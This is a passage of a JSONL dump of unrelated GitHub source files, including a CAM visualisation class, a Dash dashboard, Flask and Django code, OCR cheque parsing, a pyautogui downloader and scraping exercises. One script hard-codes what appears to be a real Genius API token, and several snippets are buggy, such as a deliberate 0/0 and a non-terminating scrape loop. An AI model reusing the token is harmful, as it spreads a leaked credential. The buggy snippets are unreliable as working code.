long_description=long_description,\n url='https://github.com/elampapi/python-elampclient',\n author='eLamp',\n author_email='support@elamp.fr',\n license='MIT',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: System :: Networking',\n 'Topic :: Office/Business',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords='elamp elamp-web elamp-api skill skill data',\n packages=find_packages(exclude=['docs', 'docs-src', 'tests']),\n install_requires=[\n 'websocket-client >=0.35, <1.0a0',\n 'requests >=2.11, <3.0a0',\n 'six >=1.10, <2.0a0',\n 'PyJWT >=1.6.4',\n 'cryptography >=2.3'\n ])","repo_name":"elamp/python-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74650317670","text":"from collections import Sequence\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom tqdm import tqdm\nfrom libs.cams.basic import _BaseWrapper\n\nclass BagCAMs(_BaseWrapper):\n\n def __init__(self, extractor, classifier):\n self.fmap_pool = {}\n self.fmap_pool_in = {}\n self.grad_pool = {}\n self.grad_pool_in = {}\n \n super(BagCAMs, self).__init__(extractor, classifier)\n \n def save_grads(key):\n def backward_hook(module, grad_in, grad_out):\n self.grad_pool[key] = grad_out[0].detach()\n\n if isinstance(module, nn.ReLU):\n return (F.relu(grad_in[0]),)\n \n return backward_hook\n \n def save_fmaps(key):\n def forward_hook(module, input, output):\n self.fmap_pool[key] = output.detach()\n self.fmap_pool_in[key] = input[0].detach()\n\n return forward_hook\n\n for module in self.model.named_modules():\n self.handlers.append(module[1].register_forward_hook(save_fmaps(module[0])))\n self.handlers.append(module[1].register_backward_hook(save_grads(module[0])))\n\n def _find(self, pool, target_layer):\n if target_layer in pool.keys():\n return pool[target_layer]\n else:\n raise ValueError(\"Invalid layer name: {}\".format(target_layer))\n\n def backward(self, ids):\n \"\"\"\n Class-specific backpropagation\n \"\"\"\n self.ids = ids\n one_hot = self._encode_one_hot(ids)\n self.model.zero_grad()\n ##\n self.phi = torch.zeros(self.logits.shape[0], 1).cuda()\n for i in range(0, self.logits.shape[0]):\n self.phi[i] = self.logits[i, ids[i]]\n # self.logits[:, ids]\n ##\n #print(one_hot)\n self.logits.log().backward(gradient=one_hot, retain_graph=True)\n\n def generate(self, target_layer):\n\n ##obtain the gradient\n grads = self._find(self.grad_pool, target_layer)\n\n ##obtain the feature map\n features = self._find(self.fmap_pool, target_layer)\n\n ##Calculate BagCAMs\n term_2 = grads*features\n term_1 = grads*features + 1\n term_1 = F.adaptive_avg_pool2d(term_1, 1) #sum_m\n bagcams = torch.relu(torch.mul(term_1, term_2)).sum(dim=1, keepdim=True) #sum_c\n\n ##Upsampling to Original Size of Images\n bagcams = F.interpolate(\n bagcams, self.image_shape, mode=\"bilinear\", align_corners=False\n )\n \n ##Normalized the localization Maps\n B, C, H, W = bagcams.shape\n bagcams = bagcams.view(B, -1)\n bagcams -= bagcams.min(dim=1, keepdim=True)[0]\n bagcams /= bagcams.max(dim=1, keepdim=True)[0]\n bagcams = 
bagcams.view(B, C, H, W)\n\n return bagcams","repo_name":"zh460045050/BagCAMs","sub_path":"libs/cams/bagcams.py","file_name":"bagcams.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"71"} +{"seq_id":"15983325630","text":"import sys\nimport dash\nimport importlib\nfrom dash import dcc, html\nimport plotly.express as px\nfrom scipy.integrate import solve_ivp\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Output, Input\nfrom utilities import Parameters, create_parameter_sliders\n\nif len(sys.argv) != 2:\n raise ValueError(\"Please provide input file\")\nelif len(sys.argv) == 2:\n file_location = '/'.join(sys.argv[1].split('/')[:-1])\n sys.path.append(file_location)\n file_name = sys.argv[1].split('/')[-1]\n module_name = file_name.split('.')[0]\n try:\n model = importlib.import_module(module_name)\n except ImportError:\n raise ImportError(\"File not found\")\n\n\ncolors = px.colors.qualitative.Dark24\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])\napp.title = \"Mathematical Model Interactive Dashboard\"\nserver = app.server\n\napp.layout = dbc.Container(\n [\n dbc.Row([\n dbc.Col([\n html.H1(app.title, style={\"text-align\": \"center\"}),\n ], className=\"py-2\"),\n ], className=\"g-0\", style={\"flex\": \"0 1 auto\"}),\n dbc.Row([\n dbc.Col([\n dbc.Row([\n dbc.Col([html.H4(\"Model Parameters\")],\n style={\"text-align\": \"center\"},\n className=\"pt-1\"),\n dbc.Col([dbc.Button('Reset', id='reset_params',\n class_name='primary my-1', n_clicks=0)], width=3),\n ], style={\"width\": \"100%\"}, className=\"pb-3\"),\n *create_parameter_sliders(model.parameters),\n dbc.Row([\n dbc.Col([html.H4(\"Simulation Parameters\")],\n style={\"text-align\": \"center\"})\n ], style={\"width\": \"100%\"}, className=\"py-3\"),\n dbc.Row([\n dbc.Col([\n dbc.Row(html.H5(\"Simulation Time\",\n style={\"text-align\": \"center\"}),\n className=\"pt-2\"),\n ]),\n dbc.Col([\n dbc.Input(id=\"sim_time-input\", type=\"number\",\n value=1000, min=1e-4, max=1e4,\n debounce=False)\n ]),\n ], style={\"width\": \"100%\"}, className=\"px-3\", align=\"center\"),\n\n dbc.Row([\n html.Div([html.H4(\"Plot Parameters\")],\n style={\"text-align\": \"center\"})\n ], style={\"width\": \"100%\"}, className=\"py-3\"),\n dbc.Row([\n dbc.Col([\n dbc.Row(html.H5(\"Plot height (px)\",\n style={\"text-align\": \"center\"}),\n className=\"pt-2\"),\n ]),\n dbc.Col([\n dbc.Input(id=\"plot_height-input\", type=\"number\",\n value=200, min=10, max=800, debounce=False)\n ]),\n ], style={\"width\": \"100%\"}, className=\"px-3\", align=\"center\"),\n ], width=3, style={\"height\": \"100%\", \"overflow\": \"auto\"}),\n\n dbc.Col([\n dbc.Row(\n dcc.Graph(\n id=f\"{var}\"), id=f\"{var}-row\", style={\"width\": \"100%\"})\n for var in model.variables.keys()],\n width=9, style={\"height\": \"100%\", \"overflow\": \"auto\"}),\n ], className=\"g-0\", style={\"flex\": \"1 1 auto\", \"overflow\": \"auto\"}),\n ], fluid=True, className=\"g-0\",\n style={\"height\": \"100vh\", \"display\": \"flex\", \"flex-direction\": \"column\"})\n\n\n@app.callback(\n [Output(f\"{p}-display\", \"children\") for p in model.parameters.keys()],\n [Input(f\"{p}-slider\", \"drag_value\") for p in model.parameters.keys()],\n prevent_initial_call=True)\ndef update_labels(*params):\n return [f\"{p}: {params[i]:.3f}\"\n for i, p in enumerate(model.parameters.keys())]\n\n\n@app.callback(\n [Output(f\"{p}-slider\", \"value\") for p in 
model.parameters.keys()],\n Input('reset_params', 'n_clicks'),\n prevent_initial_call=True)\ndef reset_params(n_clicks):\n return [model.parameters[p]['init'] for p in model.parameters.keys()]\n\n\n@app.callback(\n [Output(f\"{v}\", \"figure\") for v in model.variables.keys()],\n Input('sim_time-input', \"value\"), Input(\"plot_height-input\", \"value\"),\n [Input(f\"{p}-slider\", \"value\") for p in model.parameters.keys()],\n prevent_initial_call=False)\ndef simulate(t_stop, height, *params):\n if t_stop is None:\n t_stop = 1000\n elif height is None:\n height = 200\n\n p_dict = {p: float(val) for p, val in\n list(zip(model.parameters.keys(), params))}\n p = Parameters(p_dict)\n init_cond = [val for _, val in model.variables.items()]\n sol = solve_ivp(model.equations, [0, t_stop], init_cond, args=(p,),\n method='LSODA')\n\n figures = []\n\n for idx, var in enumerate(model.variables.keys()):\n fig = px.scatter(x=sol.t, y=sol.y[idx, :],\n labels={'x': 'Time', 'y': f\"{var}\"},\n height=height)\n fig['data'][0]['line']['color'] = colors[idx]\n fig.update_layout(font=dict(size=15), margin=dict(t=0.1, b=0, r=25),\n hovermode=False)\n figures.append(fig)\n\n return figures\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"ftavella/model-dashboard","sub_path":"src/dashboard_app.py","file_name":"dashboard_app.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"17583509609","text":"#!/usr/bin/python3\r\n\"\"\"Queries reddit api for num of subscribers for a given subreddit\"\"\"\r\n\r\nimport requests\r\n\r\n\r\ndef number_of_subscribers(subreddit):\r\n \"\"\"Returns number of subscribers\"\"\"\r\n user_agent = {'User-agent': 'Mozilla/5.0'}\r\n url = \"https://www.reddit.com/r/\" + subreddit + \"/about.json\"\r\n resp = requests.get(url, allow_redirects=False, headers=user_agent)\r\n if resp.status_code in (302, 404):\r\n return 0\r\n return resp.json().get('data').get('subscribers')\r\n","repo_name":"paul-murithi/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28654702260","text":"import csv\npath='/home/rishabh/F/MTECH/Software-Systems-Development/python/weighted_score_date_format.csv'\nf=open(path, 'r')\nrow=csv.reader(f)\nheader = next(f)\nfor line in row:\n\ttry:\n\t\tpart1 = line[2].strip(\"'\")\n\t\tpart2 = line[3].strip(\"'\")\n\t\tpartM = int(part1) * float(part2)\n\texcept ValueError as err:\n\t\tprint(\"something wrong...\",err)\n\t\tcontinue\n\t\tprint(line)\n\t#print('First part : ',line[2])\n\t\n\tprint(partM)\nf.close()","repo_name":"rishabh26malik/MTECH-SEM-1-BACKUP","sub_path":"Software-Systems-Development/python/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19474754553","text":"from rest_framework.viewsets import ModelViewSet\n\n\nclass MutableModelViewSet(object):\n @classmethod\n def create(cls, model, serializer_class):\n class_name = '{0}ViewSet'.format(model.__name__)\n attrs = {\n 'queryset': model.objects.all(),\n 'serializer_class': serializer_class\n }\n return type(class_name, (ModelViewSet,), 
attrs)\n","repo_name":"JesusAnaya/mezzanine-rest-api","sub_path":"mezzanine_rest/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7072232572","text":"#tesseract for micr detection using language 'mcr' from the trained model\nimport pytesseract as tess\nfrom PIL import Image,ImageEnhance\nimport numpy as np\nimport cv2\n\n# add tesseract to path\ntess.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\n\ndef micr(path):\n cheque_img = Image.open(path)\n\n #checking the mode\n cheque_img=np.array(cheque_img.convert('RGB'))\n\n shape=cheque_img.shape\n\n micr_extraction= cheque_img[int(shape[0]*0.92):int(shape[0]*0.99), int(shape[1]*0.25):int(shape[1]*0.8)]\n cv2.imwrite(r'micr.jpg',micr_extraction)\n micr_string=tess.image_to_string(micr_extraction,lang=\"mcr\")\n # c000009c 60001205901 00274880 31\n # 0000000980 60001205901 00274880 31\n # c000009d0 60001205901 00274880 31\n # c000009c 60001205901 002748c 31\n # micr_string= \"c000009c 60001205901 002748c 31\"\n\n cheque_number=\"\"\n '''The string before first space is cheque number'''\n val=micr_string.split()[0]\n if 'c' in micr_string:\n for i in val:\n if i.isdigit():\n cheque_number+=i\n \n else:\n ind=(len(val)-6)//2\n cheque_number=val[ind:ind+6]\n\n '''final micr'''\n final_micr=micr_string.split()[1][:9]\n Account_ID=micr_string.split()[2][:6]\n Transaction_code=micr_string[-3:]\n print(micr_string)\n print(\"Cheque number :\",cheque_number)\n print(\"MICR code :\",final_micr)\n print(\"Account ID :\",Account_ID)\n print(\"Transaction code :\",Transaction_code)\n return cheque_number,final_micr,Account_ID,Transaction_code\n\n\n# print(micr(r'C:\\Users\\ANU\\Downloads\\bob_bhuvana_signNV_1.jpg'))","repo_name":"ANUSHRUTHIKAE/BOB_PROJ","sub_path":"micr.py","file_name":"micr.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71989704230","text":"# find max artist id\n\nimport lyricsgenius\ngenius = lyricsgenius.Genius(\"uZp3-3BY12KCvrTaSmi3Gv9EuTEAp-t4X4QOZ1OJbzWgVZakFrP4GF0Vsj0cz_Lu\")\n\nartist_id = 2961456\nresponse = genius.artist_songs(artist_id, per_page=50, page=1)\nprint(response[\"songs\"])\nmax_err = 0\n0/0\nwhile artist_id < 2961595:\n\ttry:\n\t\tresponse = genius.artist_songs(artist_id, per_page=50, page=1)\n\t\tprint(artist_id)\n\texcept:\n\t\tmax_err += 1\n\t\tprint(max_err)\n\tartist_id += 1\n\n\nmax_artist_id = 2961456\n","repo_name":"gokulkolady/lyrec_nlp","sub_path":"max_artist_id.py","file_name":"max_artist_id.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38968853766","text":"'''\r\n 创建数据集,分为用户点对,uav节点位置\r\n'''\r\nimport torch\r\nimport numpy as np\r\nimport random\r\nfrom configs import args\r\nfrom sklearn.cluster import KMeans\r\n\r\n\r\ndef data_create(N, M):\r\n '''\r\n input:\r\n N:用户对数\r\n M:无人机个数\r\n \r\n Output:\r\n features:用户和无人机的位置,前2N个为用户坐标,后M个为无人机坐标\r\n edge_index:边的索引\r\n \r\n 用户位置随机生成\r\n 无人机位置为2N个用户的KMeans聚类\r\n '''\r\n # torch.manual_seed(50)\r\n # random.seed(50)\r\n x1 = torch.rand(N, 1)\r\n x2 = torch.rand(N, 1)\r\n y1 = torch.rand(N, 1)\r\n y2 = torch.rand(N, 1)\r\n\r\n idx = list(range(N))\r\n random.shuffle(idx)\r\n x1 = x1[idx]\r\n random.shuffle(idx)\r\n x2 = x2[idx]\r\n\r\n user_src = torch.column_stack([x1, 
y1])\r\n user_dst = torch.column_stack([x2, y2])\r\n users = torch.row_stack([user_src, user_dst])\r\n kmeans = KMeans(n_clusters=M, random_state=0).fit(users.numpy())\r\n uav = torch.FloatTensor(kmeans.cluster_centers_)\r\n # index_src = torch.repeat_interleave(torch.arange(len(users), len(users)+len(uav)).unsqueeze(1), repeats=len(users)+len(uav), dim=1)\r\n index_src = torch.repeat_interleave(torch.arange(len(users), len(users)+len(uav)).unsqueeze(1), repeats=len(users), dim=1)\r\n index_src = torch.reshape(index_src, (1, -1)).squeeze()\r\n \r\n # index_dst = torch.arange(0, len(users)+len(uav)).repeat(len(uav))\r\n index_dst = torch.arange(0, len(users)).repeat(len(uav))\r\n features = torch.row_stack([user_src, user_dst, uav]).to(args.device)\r\n edge_index = torch.row_stack([index_src, index_dst]).to(args.device)\r\n\r\n return features, edge_index\r\n\r\n# features, edge_index = data_create(100, 10)\r\n# print(edge_index)\r\n# print(edge_index.shape)\r\n# exit()\r\n","repo_name":"UNIC-Lab/LGNN-RGNN","sub_path":"data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"8140813455","text":"\"\"\"empty message\n\nRevision ID: 7aa5c1a67dce\nRevises: 521ce838dbdf\nCreate Date: 2018-06-26 19:04:57.105964\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '7aa5c1a67dce'\ndown_revision = '521ce838dbdf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('posts', 'category')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.add_column('posts', sa.Column('category', mysql.VARCHAR(length=255), nullable=True))\n    # ### end Alembic commands ###\n","repo_name":"johnwang1996/myDemo","sub_path":"loginAndRegist/migrations/versions/7aa5c1a67dce_.py","file_name":"7aa5c1a67dce_.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73538462631","text":"class Solution:\n    '''\n    为奇数时,中间不需要旋转,所以旋转的个数为n^2-1,即(n+1)(n-1),偶数同理,\n    因为一次循环是同时互相交换4个点,所以总的旋转次数要除以4。\n    剩下就是计算旋转下标,这个可以用5X5的矩阵中的[2][0]的旋转来debug,\n    例如[4][2]旋转后为[2][0]\n    '''\n    def rotate(self, matrix: List[List[int]]) -> None:\n        \"\"\"\n        Do not return anything, modify matrix in-place instead.\n        \"\"\"\n        size = len(matrix);\n        if size % 2 == 0:\n            for row in range(size // 2):\n                for col in range(size // 2):\n                    matrix[row][col],matrix[size-col-1][row],\\\n                    matrix[size-row-1][size-col-1],matrix[col][size-row-1]\\\n                    = matrix[size-col-1][row],matrix[size-row-1][size-col-1],\\\n                    matrix[col][size-row-1],matrix[row][col]\n        else:\n            for row in range((size+1) // 2):\n                for col in range((size-1) // 2):\n                    matrix[row][col], matrix[size - col - 1][row], \\\n                    matrix[size - row - 1][size - col - 1], matrix[col][size - row - 1] \\\n                    = matrix[size - col - 1][row], matrix[size - row - 1][size - col - 1], \\\n                    matrix[col][size - row - 1], matrix[row][col]","repo_name":"JackCaptain1015/py_lc","sub_path":"48_旋转图像.py","file_name":"48_旋转图像.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"17579646949","text":"\nimport imp\nfrom flask_app import app\nfrom flask import render_template, session, redirect, request\nfrom flask_app.models.owner import Owner\n\n@app.route(\"/makeOwner\")\ndef makeOwner():\n    return render_template(\"makeOwner.html\")\n\n\n@app.route(\"/makingOwner\", methods=[\"POST\"])\ndef making_owner():\n    data = {\n        \"first_name\" : request.form[\"first_name\"],\n        \"last_name\" : request.form[\"last_name\"]\n\n    }\n    owner_id = Owner.save_owner(data)\n    return redirect(\"/\")\n\n@app.route(\"/owner/<owner_id>\")\ndef show_owner(owner_id):\n    data = {\n        \"id\" : owner_id\n    }\n    owner = Owner.get_owner_with_teams(data)\n    return render_template(\"one_owner.html\", owner = owner)\n\n\n#===========================================================\n#delete\n@app.route(\"/delete/<id>\")\ndef delete_owner(id):\n    data = {\n        \"id\" : id\n    }\n    Owner.delete(data)\n    return redirect(\"/\")\n\n@app.route(\"/update/<id>\")\ndef update_owner(id):\n    data = {\n        \"id\" : id\n    }\n    owner = Owner.one_owner(data)\n    return render_template(\"update.html\", owner = owner)\n\n@app.route(\"/updating/<id>\", methods=[\"POST\"])\ndef updating_owner(id):\n    data = {\n        \"id\" : id,\n        \"first_name\" : request.form[\"first_name\"],\n        \"last_name\" : request.form[\"last_name\"]\n\n    }\n    Owner.Updating(data)\n    return redirect(\"/\")\n","repo_name":"TumnahST96/CodingDojo","sub_path":"Flask_SQL/FullLogIn/flask_app/controllers/ownercontroller.py","file_name":"ownercontroller.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74343448228","text":"import pyautogui as pag\r\nimport time, os, datetime, shutil\r\nimport keyboard\r\nimport random\r\nimport win32api, win32con\r\nimg='NSE Website 
images\\\\'\r\ntab=img+'newTab.PNG'\r\narchives=img+'archivesTab.PNG'\r\ndateBox=img+'dateBox.PNG'\r\nleftButton='left.png'\r\nbhavcopy=img+'Bhavcopy.PNG'\r\ndownload=img+'download.png'\r\ntop=img+'topImage.png'\r\n#pag.displayMousePosition()\r\ntarget=datetime.date(1999,1,1)\r\ndef lClick(x,y):\r\n pag.moveTo(x,y,0.5)\r\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\r\n time.sleep(1) #This pauses the script for 0.05 seconds\r\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\r\ndef rClick(x,y):\r\n pag.moveTo(x,y,0.5)\r\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN,0,0)\r\n time.sleep(0.5) #This pauses the script for 0.05 seconds\r\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP,0,0)\r\ndef finder(img,side):\r\n temp=4000\r\n attempt = 0\r\n while temp>2999:\r\n if pag.locateOnScreen(img, grayscale=True) != None: #region=(150,175,259,194),\r\n print(\"I found \"+img+\"\\n and clicking now\")\r\n pic=pag.locateCenterOnScreen(img, grayscale=True)\r\n cent=pic\r\n temp=1000\r\n elif attempt>20:\r\n pag.press('home')\r\n time.sleep(1)\r\n attempt=0\r\n else:\r\n print(\"I could not find \"+img)\r\n attempt += 1\r\n temp=3000\r\n cent=[0,0]\r\n pag.scroll(-200)\r\n print(\"Scrolled and checking\")\r\n time.sleep(1)\r\n if side == 'l':\r\n lClick(cent[0],cent[1])\r\n elif side == 'r':\r\n rClick(cent[0],cent[1])\r\n else:\r\n pag.moveTo(cent[0],cent[1],1)\r\n\r\ndef d(dd):\r\n if dd<10:\r\n return '0'+str(dd)\r\n else:\r\n return str(dd)\r\n\r\ndef m(mm):\r\n months = {1 : 'JAN',\r\n 2 : 'FEB',\r\n 3 : 'MAR',\r\n 4 : 'APR',\r\n 5 : 'MAY',\r\n 6 : 'JUN',\r\n 7 : 'JUL',\r\n 8 : 'AUG',\r\n 9 : 'SEP',\r\n 10: 'OCT',\r\n 11: 'NOV',\r\n 12: 'DEC'}\r\n return months[mm]\r\n\r\ndef previousDay(date):\r\n day31 = [1,3,5,7,8,10,12]\r\n day30 = [4,6,9,11]\r\n day = date.day\r\n month = date.month\r\n year = date.year\r\n day = day - 1\r\n if day == 0:\r\n month = month - 1\r\n if month == 0:\r\n year = year - 1\r\n month = 12\r\n if month in day31:\r\n day = 31\r\n elif month in day30:\r\n day = 30\r\n elif year%4 == 0:\r\n day = 29\r\n else:\r\n day = 28\r\n return datetime.date(year,month,day)\r\n\r\ndef previousWeekDay(date):\r\n if 1 prev_balance\n\ndef test_order_market_sell():\n c = setup_client()\n c.order_market_buy('btc',.01)\n prev_balance = c.account[\"balances\"][1][\"free\"]\n c.order_market_sell(\"btc\",.01)\n curr_balance = c.account[\"balances\"][1][\"free\"]\n assert curr_balance < prev_balance\n\ndef test_get_price():\n b_acc = setup_acc()\n price = b_acc.get_price('BTC')\n assert isinstance(price,float)\n\ndef test_get_net_value():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n value = b_acc.get_net_value()\n assert int(value) == 1000\n\ndef test_get_balance():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n value = b_acc.get_balance(symbol='BTC')\n assert value == 0\n\ndef test_place_order():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n b_acc.place_order(\"buy\",.01,'btc')\n assert b_acc.get_balance(\"btc\") == .01\n\ndef test_place_order_1():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n b_acc.place_order(\"buy\",.01,'btc')\n b_acc.place_order(\"sell\",.01,'btc')\n assert b_acc.get_balance(\"btc\") == 0\n","repo_name":"mko237/btc-auto","sub_path":"test_binance_account_btest.py","file_name":"test_binance_account_btest.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} 
+{"seq_id":"28954161306","text":"#--------------------------------------------------------------------------------\n# G e n e r a l I n f o r m a t i o n\n#--------------------------------------------------------------------------------\n# Name: Exercise 4.1\n#\n# Usage: python \"Exercise 4.1.py\"\n#\n# Description: Calculates the factorial for a user-given number.\n#\n# Inputs: User input - number to calculate factorial for.\n#\n# Outputs: Console data - factorial for given number.\n#\n# Auxiliary Files: None\n#\n# Special Instructions: None\n#\n#--------------------------------------------------------------------------------\n# C o d e H i s t o r y\n#--------------------------------------------------------------------------------\n# Version: 1.0\n#\n# Author(s): Kole Frazier\n#\n#--------------------------------------------------------------------------------\n# --- Exercise 4.1 ---\n#\n# ----- EXERCISE ANSWERS -----\n# When increasing the number to a very large number, the program starts hitting the limits of computer precision.\n# More specifically with the floating point interpretation, an input of 200 makes the result larger than what Python can handle\n# in floating point math, so Python returns \"infinite\"/\"inf\" in place of an actual value.\n\n#Calculate the factorial using integers numbers.\ndef FactorialInt(number):\n FinalValue = int(number)\n for n in range((number-1), 1, -1):\n FinalValue *= int(n)\n #print('DBG: n={0} && FinalValue={1}'.format(n, FinalValue))\n \n return FinalValue\n\n#Calculate the factorial using floating point numbers.\ndef FactorialFloat(number):\n FinalValue = float(number)\n for n in range((number-1), 1, -1):\n FinalValue *= float(n)\n #print('DBG: n={0} && FinalValue={1}'.format(n, FinalValue))\n \n return FinalValue\n\n#Get user input, raw - not casted to float or int.\nInput = input('Enter a number to calculate a factorial for: ')\n\n#Get factorial for input as an int and float.\nprint('Factorial for int({0}) is: {1}'.format(int(Input), FactorialInt(Input)))\nprint('Factorial for float({0}) is: {1}'.format(float(Input), FactorialFloat(Input)))","repo_name":"kolefrazier/PHYS2300-Assignments","sub_path":"Assignments/Assignment 4/Exercise 4.1.py","file_name":"Exercise 4.1.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13024363203","text":"\"\"\"\nFile Organization\n\"\"\"\n\n# The dict \"files\" below contains file names and the name of the person who owns each file. Write and call a function to reorganize \"files\" such that it contains each person's name and the files he/she owns. Assign the resultant dict to a new dict called \"grouped_by_owner\". 
Print out the key value pairs in this format - key: value.\n\n# Function name should be: group_by_owners\n# Dict of results should be named: files_by_owner\n\nfiles = {\n 'Input1.txt': 'Beau',\n 'Code1.py': 'Mischa',\n 'Output1.txt': 'Beau',\n 'Input2.txt': 'Beau',\n 'Code2.py': 'Mischa',\n 'Output2.txt': 'Beau',\n 'Input3.txt': 'Percy',\n 'Code3.py': 'Alejandra',\n 'Output3.txt': 'Percy'\n}\n\n\n","repo_name":"mottaquikarim/pydev-psets","sub_path":"pset_functions/data_manipulation/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"} +{"seq_id":"18944921385","text":"from parsel import Selector\nimport requests\nfrom pymongo import MongoClient\n\n\nclient = MongoClient(\"mongodb://127.0.0.1:27017/\")\n\ndefault_url = \"http://books.toscrape.com\"\nresponse = requests.get(default_url)\nselector = Selector(text=response.text)\nnext_page_url = selector.css('.pager .next a::attr(href)').get()\n\n\n\nwhile next_page_url:\n response = requests.get(default_url + next_page_url)\n titles = selector.css('.product_pod h3 a::attr(title)').getall()\n prices = selector.css('.product_price .price_color::text').getall()\n\nprint(titles)","repo_name":"Lucas-GSS/trybe-exercises","sub_path":"ciencia-da-computacao/redes-raspagem-de-dados/dia-2-raspagem-de-dados/fixacao/example_scrape.py","file_name":"example_scrape.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12602616839","text":"from django.core import exceptions\nfrom rest_framework import serializers\n\nfrom restapi import models\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n is_favorite = serializers.SerializerMethodField(read_only=True, default=False)\n\n class Meta:\n model = models.Recipe\n fields = ['id', 'name', 'description', 'duration', 'portion', 'pictures', 'total_iron', 'is_favorite',\n 'ingredients']\n extra_kwargs = {\n 'pictures': {\n 'read_only': True\n }\n }\n\n def get_is_favorite(self, recipe):\n user = self.context['request'].user\n try:\n user_recipes = models.UserRecipe.objects.get(user=user, recipe=recipe)\n except exceptions.ObjectDoesNotExist:\n return False\n else:\n if recipe.id == user_recipes.recipe.id:\n return True\n return False\n","repo_name":"biancadinu/licenta-backend","sub_path":"backend/restapi/serializers/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73530088548","text":"import os\r\nimport sys\r\nimport cv2\r\n\r\n# Flask\r\nfrom flask import Flask, redirect, url_for, request, render_template, Response, jsonify, redirect\r\nfrom werkzeug.utils import secure_filename\r\nfrom gevent.pywsgi import WSGIServer\r\n\r\n# TensorFlow and tf.keras\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nfrom keras.applications.imagenet_utils import preprocess_input, decode_predictions\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\n\r\n# Some utilites\r\nimport numpy as np\r\nfrom util import base64_to_pil\r\n\r\n\r\n# Declare a flask app\r\napp = Flask(__name__)\r\n\r\n\r\nprint('Model loaded. 
